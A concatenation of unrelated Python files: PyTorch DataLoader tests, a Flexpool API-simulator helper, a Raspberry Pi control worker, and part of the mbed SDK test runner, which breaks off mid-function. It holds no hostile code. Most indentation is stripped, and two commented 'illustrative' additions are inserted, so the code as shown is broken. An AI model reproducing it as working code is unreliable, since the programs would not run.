r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2(TestCase):
@skipIfNoDill
def test_basics(self):
# TODO(VitalyFedyunin): This test will start breaking if we remove guaranteed order
# of traversing workers
dp = IterableWrapper(list(range(1000)))
dl = DataLoader(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2 = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2_threading = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2, parallelism_mode='thread')
self.assertEqual(list(dl), list(dl2))
self.assertEqual(list(dl), list(dl2_threading))
def test_shuffle(self):
items = list(range(1000))
dp = IterableWrapper(items).sharding_filter().shuffle()
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=False)
self.assertEqual(items, list(dl))
dl = DataLoader(dp, batch_size=None, num_workers=2, shuffle=False,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertEqual(items, list(dl))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=True)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
dl = DataLoader(dp, batch_size=None, num_workers=2, shuffle=True,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2_EventLoop(TestCase):
@skipIfNoDill
def test_basic_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
it = list(range(100))
numbers_dp = IterableWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(numbers_dp)
process.start()
local_datapipe = communication.iter.QueueWrapper(
communication.protocol.IterDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
clean_me(process, req_queue, res_queue)
self.assertEqual(list(range(100)), actual)
@skipIfNoDill
def test_basic_mapdatapipe_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
input_len = 100
it = list(range(input_len))
numbers_dp = SequenceWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(
numbers_dp)
process.start()
# Functional Test: Ensure that you can retrieve every element from the Queue and DataPipe
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
self.assertEqual([(x, x) for x in range(100)], actual)
# Functional Test: raise an IndexError when the requested index is out of bounds
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
with self.assertRaisesRegex(IndexError, "out of bound"):
local_datapipe[1000]
# __len__ Test: Ensure that the correct length is returned
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
self.assertEqual(input_len, len(local_datapipe))
clean_me(process, req_queue, res_queue)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# The persistent workers always maintain the original
# dataset through the dataloader lifetime
# so the attributes will remain the same as the
# first time the workers were spawned (dataloader iteration)
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN, "DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect on the dataset
# cached by the workers, since they are not recreated between epochs
# and can cache values safely
dataset.start = i
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
def __init__(self, data):
transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` can not be correctly unpickled from spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"Flaky with ASAN, see https://github.com/pytorch/pytorch/issues/65727")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
timeout=5, worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
max_num_workers = None
if hasattr(os, 'sched_getaffinity'):
try:
max_num_workers = len(os.sched_getaffinity(0))
except Exception:
pass
if max_num_workers is None:
cpu_count = os.cpu_count()
if cpu_count is not None:
# Use half number of CPUs
max_num_workers = cpu_count // 2
if max_num_workers is None:
max_num_workers = 1
for batch_size in (8, 16, 32, 64):
for num_workers in range(0, min(6, max_num_workers)):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers + 1)
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [multiprocessing.cpu_count() - 1])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [multiprocessing.cpu_count() - 1])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution on parent process
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
|
simutils.py
|
#
# Software distributed under MIT License (MIT)
#
# Copyright (c) 2020 Flexpool
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
import threading
import requests
import time
def selftest_api_method():
return "1"
class APISimulator:
def __init__(self, app):
self.app = app
self.thread = None
app.route("/selftest")(selftest_api_method)
def start(self):
self.thread = StoppableThread(target=self.app.run, daemon=True)
self.thread.start()
while True:
try:
if requests.get("http://localhost:5000/selftest").text == "1":
break
except requests.ConnectionError:
pass
time.sleep(1)
def stop(self):
self.thread.stop()
class StoppableThread(threading.Thread):
# https://stackoverflow.com/questions/323972/is-there-any-way-to-kill-a-thread
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
def wrap_response(data):
return json.dumps({"result": data, "error": None})
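# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# StoppableThread only sets an Event; the running code must poll stopped() itself.
# A minimal, assumed example: subclass it, override run(), and leave the loop once
# stop() has been called. The class name and sleep interval below are illustrative.
class _ExamplePollingThread(StoppableThread):
    def run(self):
        while not self.stopped():
            # ... do periodic work here ...
            time.sleep(0.1)

if __name__ == "__main__":
    # Guarded so that importing simutils stays side-effect free.
    example = _ExamplePollingThread(daemon=True)
    example.start()
    time.sleep(0.5)
    example.stop()   # sets the event; run() notices it on the next poll
    example.join()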
|
pi_control_worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
sys.path.append('..')
from controls.pi.button_control import (ButtonControl)
import variables
#r = redis.Redis(host='127.0.0.1', port=6379)
# def clamp(n, smallest, largest): return max(smallest, min(n, largest))
class PiControlWorker():
def __init__(self, config, main_thread_running, system_ready):
#self.config = {**config, **self.config}
self.config = config
self.channel = config.get('channel', 'controls').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 0.5)
self.main_thread_running = main_thread_running
self.system_ready = system_ready
#Store initialized controls so the worker loop can read them
self.controls = []
self.init_controls()
return
def dynamic_import(self, name):
#Split path of the class folder structure: {control name}_control . {ControlName}Control
components = name.split('.')
#Dynamically import root of component path
module = __import__(components[0])
#Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
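# Illustrative example (assumed path): dynamic_import('controls.pi.button_control.ButtonControl')
# first imports the top-level 'controls' package, then walks the attribute chain
# pi -> button_control -> ButtonControl and returns the ButtonControl class.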
def init_controls(self):
for control in self.config['controls']:
if control.get('type', None) is not None:
#Get the control from the controls folder {control name}_control.{ControlName}Control
control_type = 'controls.pi.' + control.get('type').lower() + '_control.' + control.get('type').capitalize() + 'Control'
imported_control = self.dynamic_import(control_type)
#new_control = imported_control(control.get('pin'), name=control.get('name', control.get('type')), connection=self.connection, key=control.get('key', None))
# Define default kwargs for all control types, conditionally include optional variables below if they exist
control_kwargs = {
'name' : control.get('name', control.get('type')),
'pin' : control.get('pin'),
'key' : control.get('key', None),
'topic': control.get('topic', None),
'resistor': control.get('resistor', None),
'edge_detection': control.get('edge_detection', None),
'debounce': control.get('debounce', None)
}
# optional control variables
# add conditional control vars here...
new_control = imported_control(**control_kwargs)
new_control.init_control()
self.controls.append(new_control)
print('{type} Control {pin}...\t\t\t\033[1;32m Ready\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
print('Pi Control Worker [' + str(len(self.config['controls'])) + ' Controls]...\t\033[1;32m Running\033[0;0m')
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
readings = {}
for control in self.controls:
result = control.read()
readings[control.key] = result
time.sleep(self.sleep_duration)
#This is only run after the main thread is shut down
print("Pi Control Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import optparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename
from threading import Thread, Lock
from subprocess import Popen, PIPE
# Imports related to mbed build api
from workspace_tools.tests import TESTS
from workspace_tools.tests import TEST_MAP
from workspace_tools.paths import BUILD_DIR
from workspace_tools.paths import HOST_TESTS
from workspace_tools.utils import ToolException
from workspace_tools.utils import construct_enum
from workspace_tools.targets import TARGET_MAP
from workspace_tools.test_db import BaseDBAccess
from workspace_tools.build_api import build_project, build_mbed_libs, build_lib
from workspace_tools.build_api import get_target_supported_toolchains
from workspace_tools.build_api import write_build_report
from workspace_tools.build_api import prep_report
from workspace_tools.build_api import prep_properties
from workspace_tools.build_api import create_result
from workspace_tools.build_api import add_result_to_report
from workspace_tools.libraries import LIBRARIES, LIBRARY_MAP
from workspace_tools.toolchains import TOOLCHAIN_BIN_PATH
from workspace_tools.test_exporters import ReportExporter, ResultExporterType
import workspace_tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from workspace_tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows test x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
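# Illustrative note: with the mapping above this compiles to a pattern of the form
# r"\{(success|failure|error|...)\}", i.e. it detects result tokens such as
# "{success}" or "{timeout}" embedded in the captured test output.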
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_auto_detect = _opts_auto_detect
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
